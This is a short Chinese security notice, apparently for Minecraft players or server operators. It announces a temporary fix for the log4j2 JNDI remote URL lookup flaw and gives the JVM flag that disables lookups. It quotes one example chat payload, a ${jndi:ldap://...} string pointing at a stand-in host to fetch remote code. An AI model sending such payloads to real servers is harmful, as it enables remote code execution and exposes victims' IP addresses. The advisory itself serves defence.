已经对log4j2远程URL解析漏洞临时修复,如有补丁将会及时更新。
log4j2为MC客户端与服务端中使用的日志框架。
在1.8版本中使用的java8中包含的log4j2日志框架在处理特定输出时会解析URL
如在聊天框发送${jndi:ldap://example.website.com/virus}时
log4j2在输出日志"XXX发了一条聊天"时会尝试解析example.website.com/virus
这一过程将会暴露公网IP给website.com,使CDN等网络保护失效,并执行网站上的java代码
在java启动时加入参数-Dlog4j2.formatMsgNoLookups=true可暂时阻止该漏洞